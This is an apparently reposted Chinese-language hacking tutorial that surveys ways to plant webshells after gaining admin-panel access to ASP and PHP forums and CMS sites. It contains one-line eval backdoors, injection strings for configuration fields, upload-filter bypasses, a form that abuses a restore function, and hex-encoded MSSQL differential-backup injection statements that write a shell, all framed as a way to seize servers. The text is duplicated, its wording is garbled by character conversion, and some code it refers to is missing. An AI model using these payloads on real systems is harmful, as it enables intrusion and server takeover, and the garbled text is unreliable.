網站後臺拿shell方法總結

今日帶給大夥的都是些手藝上的總結，有些人老問經驗怎麼來的，這個即是經驗，盼願大夥都能成爲腳本妙手.

動網上傳漏洞，信任大夥拿下不少肉雞吧。可以說是動網讓upfile.asp上傳文件過濾不嚴的漏洞昭然全國，現在這種漏洞已經根柢鬥勁難見到了，不掃除一些小網站模擬仍是存在此漏洞。在拿站歷程中，我們凡是費了九牛兩虎之力拿到辦理員帳號和密碼，並順遂進入了後臺，當然此時與拿到網站webshell還有一步之遙，但仍是有良多新手因想不出合適的體例而被拒之門外。是以，我們把常用的從後臺獲得webshell的體例進行了總結和歸納，概略情形有以下十細膩面。

詳盡：若何進入後臺，不是本文談判規模，其具體體例就不說了，靠大夥去自己發揮。此文參考了前人的多方面的資料和信息，在此一併浮現感謝。

一、直接上傳獲得webshell

二、添加改削上傳典型

三、操縱後臺辦理功效寫入webshell

四、操縱後臺辦理向設置裝備擺設文件寫webshell

五、操縱後臺數據庫備份及恢復獲得webshell

六、操縱數據庫壓縮功效

七、asp+mssql系統

八、php+mysql系統

九、phpwind論壇從後臺到webshell的三種體例

一、直接上傳獲得webshell

這種對php和jsp的一些軌範鬥勁常見，MolyX BOARD即是其中一例，直接在神色圖標辦理上傳.php典型，當然沒有提醒，實在已經樂成了，上傳的文件url應該是http://admin8.us/images/smiles/下，前一陣子的聯衆遊戲站和163的jsp系統漏洞就可以直接上傳jsp文件。文件名是原本的文件名，bo-博客後臺可以可以直接上傳.php文件，上傳的文件路徑有提醒。以及一年前很是流行的upfile.asp漏洞(動網5.0和6.0、早期的良多整站系統)，因過濾上傳文件不嚴，導致用戶可以直接上傳webshell到網站盡情可寫目錄中，從而拿到網站的辦理員節制權限。

二、添加改削上傳典型

現在良多的腳本軌範上傳模塊不是隻答應上傳正當文件典型，而年夜年夜都的系統是答應添加上傳典型，bbsxp後臺可以添加asa　asP典型，ewebeditor的後臺也可添加asa典型,經由過程改削後我們可以直接上傳asa後綴的webshell了,還有一種情形是過濾了.asp，可以添加.aspasp的文件典型來上傳獲得webshell。php系統的後臺，我們可以添加.php.g1f的上傳典型，這是php的一個特徵,末尾的哪個只要不是已知的文件典型即可，php會將php.g1f作爲.php來正常運行,從而也可樂成拿到shell。LeadBbs3.14後臺獲得webshell體例是：在上傳典型中增添asp ，詳盡，asp後背是有個空格的，然後在前臺上傳ASP馬，當然也要在後背加個空格！

三、操縱後臺控制面板寫入webshell

上傳漏洞根柢上補的也差不多了,所以我們進入後臺後還可以經由過程改削相關文件來寫入webshell。鬥勁的典型的有dvbbs6.0，還有leadbbs2.88等，直接在後臺改削設置裝備擺設文件，寫入後綴是asp的文件。而LeadBbs3.14後臺獲得webshell另一體例是：添加一個新的友誼鏈接，在網站名稱處寫上冰狐最小馬即可,最小馬前後要肆意輸入一些字符，http:\\網站\inc\IncHtm\BoardLink.asp即是我們想要的shell。

四、操縱後臺辦理向設置裝備擺設文件寫webshell

操縱”"”":”"//”等標識表記標幟結構最小馬寫入軌範的設置裝備擺設文件，joekoe論壇，某某同學錄，沸騰展望動靜系統，COCOON Counter統計軌範等等，還有良多php軌範都可以，COCOON Counter統計軌範舉例，在辦理郵箱處添上[email protected]”:eval request(chr (35))//, 在配製文件中即是webmail=”[email protected]\”:eval request(chr(35))//”，還有一種體例即是寫上 [email protected]”%＞＜%eval request(chr(35))%＞＜%’，這樣就會形成前後對應，最小馬也就運行了。＜%eval request(chr(35))%＞可以用lake2的eval發送端以及最新的2006 客戶端來連，需要說明的是數據庫插馬時刻要選前者。再如動易2005，到文章中心辦理-頂部菜單設置-菜單別的特效，插入一句話馬”%＞＜%execute request(“l”)%＞＜%’，保 存頂部欄目菜單參數設置樂成後，我們就獲得馬地址http://網站/admin/rootclass_menu_config.asp。

五、操縱後臺數據庫備份及恢復獲得webshell

重若是操縱後臺對access數據庫的“備份數據庫”或“恢復數據庫”功效，“備份的數據庫路徑”等變量沒有過濾導致可以把盡情文件後綴改 爲asp，從而獲得webshell，msssql版的軌範就直接應用了access版的代碼，導致sql版仍是可以操縱。還可以備份網站asp文件爲其他後綴 如.txt文件，從而可以檢察並獲得網頁源代碼，並獲得更多的軌範信息增添獲得webshell的機緣。在現實運用中凡是會碰着沒有上傳功效的時 候，可是有asp系統在運行，操縱此體例來檢察源代碼來獲得其數據庫的位置，爲數據庫插馬來締造機緣，動網論壇就有一個ip地址的數據庫，在後臺的ip辦理中可以插入最小馬然後備份成.asp文件即可。在談談衝破上傳檢測的體例，良多asp軌範期近使改了後綴名後也會提醒文件犯警，經由過程在.asp文件頭加上gif89a改削後綴爲gif來騙過asp軌範檢測到達上傳的方針，還有一種即是用記事本打開圖片文件，肆意粘貼一部門複製到asp木馬文件頭，改削gif後綴後上傳也可以衝破檢測，然後備份爲.asp文件，樂成獲得webshell。

六、操縱數據庫壓縮功效

可以將數據的防下載失蹤效從而使插入數據庫的最小馬樂成運行，鬥勁典型的即是loveyuki的L-BLOG，在友誼添加的url出寫上＜%eval request (chr(35))%＞, 提交後，在數據庫操縱中壓縮數據庫，可以樂成壓縮出.asp文件，用海洋的最小馬的eval客戶端連就獲得一個webshell。

七、asp+mssql系統

這裏需要提一點動網mssql版，可是可以直接當地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片，然後記住其上傳路徑。寫一個當地提交的表單，代碼如下：

＜form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”＞

＜p＞已上傳文件的位置：＜input name=”Dbpath” type=”text” size=”80″＞＜/p＞

＜p＞要複製到的位置：＜input name=”backpath” type=”text” size=”80″＞＜/p＞

＜p＞＜input type=”submit” value=”提交”＞＜/p＞ ＜/form＞

另存爲.htm當地實施。把假圖片上傳路徑填在“已上傳文件的位置”何處，想要備份的WebShell的相對路徑填寫在“要複製到的位置”何處，提交就獲得我們可愛的WebShell了，恢復代碼和此類似，改削相關地方就可以了。沒有碰着事後臺實施mssql飭令鬥勁強大的asp軌範後臺，動網的數據庫還原和備份是個擺設，不能實施sql飭令備份webshell，只能實施一些大略的盤問飭令。可以操縱mssql注入差別備份webshell，一樣平常後臺是浮現了絕對路徑，只要有了注入點根柢上就可以差別備份樂成。下面是差別備份的主要語句代碼，操縱動網7.0的注入漏洞可以用差別備份一個webshell，可以用操縱上面提到的體例，將conn.asp文件備份成.txt文件而獲得庫名。

差別備份的主要代碼：

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–

這段代碼中，0×626273是要備份的庫名bbs的十六進制，可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request(“l”)%＞的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:\web\1.asp的十六進制,也即是你要備份的webshell路徑。當然也可以用鬥勁常見備份體例來獲得webshell，獨一的不夠即是備份後的文件過年夜，若是備份數據庫中有防下載的的數據表，概略有錯誤的asp代碼，備份出來的webshell就不會樂成運行，操縱差別備份是樂成率鬥勁高的體例，而且極年夜的淘汰備份文件的鉅細。

八、php+mysql系統

後臺需要有mysql數據盤問功效,我們就可以操縱它實施SELECT … INTO OUTFILE盤問輸出php文件，因爲全數的數據是存放在mysql裏的，所以我們可以經由過程正常本事把我們的webshell代碼插入mysql在操縱SELECT … INTO OUTFILE語句導出shell。

就可以暴出路徑，php情形中鬥勁輕易暴出絕對路徑：）。提一點的是碰着是mysql在win系統下路徑應該這樣寫。下面的體例是鬥勁常用的一個導出webshell的體例，也可以寫個vbs添加系統辦理員的腳本導出到啓動文件夾，系統重起後就會添加一個辦理員帳號

就會在up目錄下生成文件名爲saiy.php內容爲的最小php木馬， 末尾用lanker的客戶端來毗連。現實運用中要考慮到文件夾是否有寫權限。概略輸入這樣的代碼 將會在當前目錄生成一個a.php的最小馬。

九、phpwind論壇從後臺到webshell的三種體例

體例1 模板法

進入後臺， 氣概氣派氣概氣派模版設置 ，在肆意一行寫代碼，記着，這代碼必需頂着左邊行寫，代碼前面不成以有任何字符。

方始2 髒話過濾法

體例3 用戶品級辦理

以上三種體例獲得webshellr的密碼是a,爲lanker的一句話後門辦事端。

十、也可以操縱網站訪謁計數系統記實來獲得webshell

解決方法

因爲本文涉及的代碼版本良多，所以不概略供給一個完竣的辦理方案。有本事者可以針對本文提到的漏洞文件進行適當修補，若漏洞文件不影響系統操縱也可刪除此文件。大夥若是不會修補，可以到相關官方網站下載最新補丁進行修復更新。同時也請大夥能時辰關注各年夜平安收集揭曉的最新通告，若自己發現相關漏洞也可實時看護官方網站。

後記

實在，從後臺獲得webshell的本事應該還有良多的，關頭是要看大夥怎麼無邪運用、舉一反三，盼願本文的體例能起到拋磚引玉的浸染。 列位加油吧，讓我們將辦事器節制到底！

正進修後臺拿Shell的體例，今日恰巧在網上瞥見獲得後臺拿shell的彙總全集，很不錯的總結，分享了！版主給個精髓吧！??今日帶給大夥的都是些手藝上的總結，有些人老問經驗怎麼來的，這個即是經驗，盼願大夥都能成爲腳本妙手.??動網上傳漏洞，信任大夥拿下不少肉雞吧。可以說是動網讓upfile.asp上傳文件過濾不嚴的漏洞昭然全國，現在這種漏洞已經根柢鬥勁難見到了，不掃除一些小網站模擬仍是存在此漏洞。在拿站歷程中，我們凡是費了九牛兩虎之力拿到辦理員帳號和密碼，並順遂進入了後臺，當然此時與拿到網站webshell還有一步之遙，但仍是有良多新手因想不出合適的體例而被拒之門外。是以，我們把常用的從後臺獲得webshell的體例進行了總結和歸納，概略情形有以下十細膩面。
詳盡：若何進入後臺，不是本文談判規模，其具體體例就不說了，靠大夥去自己發揮。此文參考了前人的多方面的資料和信息，在此一併浮現感謝。
一、直接上傳獲得webshell?二、添加改削上傳典型?三、操縱後臺辦理功效寫入webshell四、操縱後臺辦理向設置裝備擺設文件寫webshell五、操縱後臺數據庫備份及恢復獲得webshell六、操縱數據庫壓縮功效七、asp+mssql系統八、php+mysql系統?九、phpwind論壇從後臺到webshell的三種體例

一、直接上傳獲得webshell
這種對php和jsp的一些軌範鬥勁常見，MolyX BOARD即是其中一例，直接在神色圖標辦理上傳.php典型，當然沒有提醒，實在已經樂成了，上傳的文件url應該是http://admin8.us/images/smiles/下，前一陣子的聯衆遊戲站和163的jsp系統漏洞就可以直接上傳jsp文件。文件名是原本的文件名，bo-博客後臺可以可以直接上傳.php文件，上傳的文件路徑有提醒。以及一年前很是流行的upfile.asp漏洞(動網5.0和6.0、早期的良多整站系統)，因過濾上傳文件不嚴，導致用戶可以直接上傳webshell到網站盡情可寫目錄中，從而拿到網站的辦理員節制權限。
二、添加改削上傳典型
現在良多的腳本軌範上傳模塊不是隻答應上傳正當文件典型，而年夜年夜都的系統是答應添加上傳典型，bbsxp後臺可以添加asa　asP典型，ewebeditor的後臺也可添加asa典型,經由過程改削後我們可以直接上傳asa後綴的webshell了,還有一種情形是過濾了.asp，可以添加.aspasp的文件典型來上傳獲得webshell。php系統的後臺，我們可以添加.php.g1f的上傳典型，這是php的一個特徵,末尾的哪個只要不是已知的文件典型即可，php會將php.g1f作爲.php來正常運行,從而也可樂成拿到shell。LeadBbs3.14後臺獲得webshell體例是：在上傳典型中增添asp ，詳盡，asp後背是有個空格的，然後在前臺上傳ASP馬，當然也要在後背加個空格！

三、操縱後臺控制面板寫入webshell
上傳漏洞根柢上補的也差不多了,所以我們進入後臺後還可以經由過程改削相關文件來寫入webshell。鬥勁的典型的有dvbbs6.0，還有leadbbs2.88等，直接在後臺改削設置裝備擺設文件，寫入後綴是asp的文件。而LeadBbs3.14後臺獲得webshell另一體例是：添加一個新的友誼鏈接，在網站名稱處寫上冰狐最小馬即可,最小馬前後要肆意輸入一些字符，http:\\網站\inc\IncHtm\BoardLink.asp即是我們想要的shell。
四、操縱後臺辦理向設置裝備擺設文件寫webshell
操縱”"”":”"//”等標識表記標幟結構最小馬寫入軌範的設置裝備擺設文件，joekoe論壇，某某同學錄，沸騰展望動靜系統，COCOON Counter統計軌範等等，還有良多php軌範都可以，COCOON Counter統計軌範舉例，在辦理郵箱處添上[email protected]”:eval request(chr (35))//, 在配製文件中即是webmail=”[email protected]\”:eval request(chr(35))//”，還有一種體例即是寫上 [email protected]”%＞＜%eval request(chr(35))%＞＜%’，這樣就會形成前後對應，最小馬也就運行了。＜%eval request(chr(35))%＞可以用lake2的eval發送端以及最新的2006 客戶端來連，需要說明的是數據庫插馬時刻要選前者。再如動易2005，到文章中心辦理-頂部菜單設置-菜單別的特效，插入一句話馬”%＞＜%execute request(“l”)%＞＜%’，保 存頂部欄目菜單參數設置樂成後，我們就獲得馬地址http://網站/admin/rootclass_menu_config.asp。
五、操縱後臺數據庫備份及恢復獲得webshell
重若是操縱後臺對access數據庫的“備份數據庫”或“恢復數據庫”功效，“備份的數據庫路徑”等變量沒有過濾導致可以把盡情文件後綴改 爲asp，從而獲得webshell，msssql版的軌範就直接應用了access版的代碼，導致sql版仍是可以操縱。還可以備份網站asp文件爲其他後綴 如.txt文件，從而可以檢察並獲得網頁源代碼，並獲得更多的軌範信息增添獲得webshell的機緣。在現實運用中凡是會碰着沒有上傳功效的時 候，可是有asp系統在運行，操縱此體例來檢察源代碼來獲得其數據庫的位置，爲數據庫插馬來締造機緣，動網論壇就有一個ip地址的數據庫，在後臺的ip辦理中可以插入最小馬然後備份成.asp文件即可。在談談衝破上傳檢測的體例，良多asp軌範期近使改了後綴名後也會提醒文件犯警，經由過程在.asp文件頭加上gif89a改削後綴爲gif來騙過asp軌範檢測到達上傳的方針，還有一種即是用記事本打開圖片文件，肆意粘貼一部門複製到asp木馬文件頭，改削gif後綴後上傳也可以衝破檢測，然後備份爲.asp文件，樂成獲得webshell。
六、操縱數據庫壓縮功效
可以將數據的防下載失蹤效從而使插入數據庫的最小馬樂成運行，鬥勁典型的即是loveyuki的L-BLOG，在友誼添加的url出寫上＜%eval request (chr(35))%＞, 提交後，在數據庫操縱中壓縮數據庫，可以樂成壓縮出.asp文件，用海洋的最小馬的eval客戶端連就獲得一個webshell。

七、asp+mssql系統
這裏需要提一點動網mssql版，可是可以直接當地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片，然後記住其上傳路徑。寫一個當地提交的表單，代碼如下：
＜form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method=”post”＞
＜p＞已上傳文件的位置：＜input name=”Dbpath” type=”text” size=”80″＞＜/p＞
＜p＞要複製到的位置：＜input name=”backpath” type=”text” size=”80″＞＜/p＞
＜p＞＜input type=”submit” value=”提交”＞＜/p＞ ＜/form＞
另存爲.htm當地實施。把假圖片上傳路徑填在“已上傳文件的位置”何處，想要備份的WebShell的相對路徑填寫在“要複製到的位置”何處，提交就獲得我們可愛的WebShell了，恢復代碼和此類似，改削相關地方就可以了。沒有碰着事後臺實施mssql飭令鬥勁強大的asp軌範後臺，動網的數據庫還原和備份是個擺設，不能實施sql飭令備份webshell，只能實施一些大略的盤問飭令。可以操縱mssql注入差別備份webshell，一樣平常後臺是浮現了絕對路徑，只要有了注入點根柢上就可以差別備份樂成。下面是差別備份的主要語句代碼，操縱動網7.0的注入漏洞可以用差別備份一個webshell，可以用操縱上面提到的體例，將conn.asp文件備份成.txt文件而獲得庫名。
差別備份的主要代碼：
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])–
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
這段代碼中，0×626273是要備份的庫名bbs的十六進制，可所以其他名字好比bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request(“l”)%＞的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:\web\1.asp的十六進制,也即是你要備份的webshell路徑。當然也可以用鬥勁常見備份體例來獲得webshell，獨一的不夠即是備份後的文件過年夜，若是備份數據庫中有防下載的的數據表，概略有錯誤的asp代碼，備份出來的webshell就不會樂成運行，操縱差別備份是樂成率鬥勁高的體例，而且極年夜的淘汰備份文件的鉅細。
八、php+mysql系統
後臺需要有mysql數據盤問功效,我們就可以操縱它實施SELECT … INTO OUTFILE盤問輸出php文件，因爲全數的數據是存放在mysql裏的，所以我們可以經由過程正常本事把我們的webshell代碼插入mysql在操縱SELECT … INTO OUTFILE語句導出shell。?　　就可以暴出路徑，php情形中鬥勁輕易暴出絕對路徑：）。提一點的是碰着是mysql在win系統下路徑應該這樣寫。下面的體例是鬥勁常用的一個導出webshell的體例，也可以寫個vbs添加系統辦理員的腳本導出到啓動文件夾，系統重起後就會添加一個辦理員帳號?　　就會在up目錄下生成文件名爲saiy.php內容爲的最小php木馬， 末尾用lanker的客戶端來毗連。現實運用中要考慮到文件夾是否有寫權限。概略輸入這樣的代碼 將會在當前目錄生成一個a.php的最小馬。
九、phpwind論壇從後臺到webshell的三種體例
體例1 模板法
進入後臺， 氣概氣派氣概氣派模版設置 ，在肆意一行寫代碼，記着，這代碼必需頂着左邊行寫，代碼前面不成以有任何字符。
方始2 髒話過濾法
體例3 用戶品級辦理
以上三種體例獲得webshellr的密碼是a,爲lanker的一句話後門辦事端。
十、也可以操縱網站訪謁計數系統記實來獲得webshell
解決方法
因爲本文涉及的代碼版本良多，所以不概略供給一個完竣的辦理方案。有本事者可以針對本文提到的漏洞文件進行適當修補，若漏洞文件不影響系統操縱也可刪除此文件。大夥若是不會修補，可以到相關官方網站下載最新補丁進行修復更新。同時也請大夥能時辰關注各年夜平安收集揭曉的最新通告，若自己發現相關漏洞也可實時看護官方網站。
後記
實在，從後臺獲得webshell的本事應該還有良多的，關頭是要看大夥怎麼無邪運用、舉一反三，盼願本文的體例能起到拋磚引玉的浸染。 列位加油吧，讓我們將辦事器節制到底！